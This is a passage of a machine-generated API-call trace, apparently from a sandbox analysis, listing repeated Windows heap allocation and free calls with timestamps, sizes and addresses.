hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc797c8 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.288] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.288] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.289] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.289] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79020 | out: hHeap=0xc50000) returned 1 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79250 | out: hHeap=0xc50000) returned 1 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79480 | out: hHeap=0xc50000) returned 1 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc797c8 | out: hHeap=0xc50000) returned 1 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c48 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc79368 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73bd0 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79598 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75848 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79020 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75848 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75498 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73be8 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75498 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc75c38 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73be8 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79138 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.291] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79598 | out: hHeap=0xc50000) returned 1 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79020 | out: hHeap=0xc50000) returned 1 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79368 | out: hHeap=0xc50000) returned 1 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79138 | out: hHeap=0xc50000) returned 1 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73bd0 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc797c8 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73d20 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc78cd8 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc762f8 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79138 [0031.292] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc762f8 | out: hHeap=0xc50000) returned 1 [0031.292] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75478 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c00 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75478 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc760b8 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c00 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79480 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760b8 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) 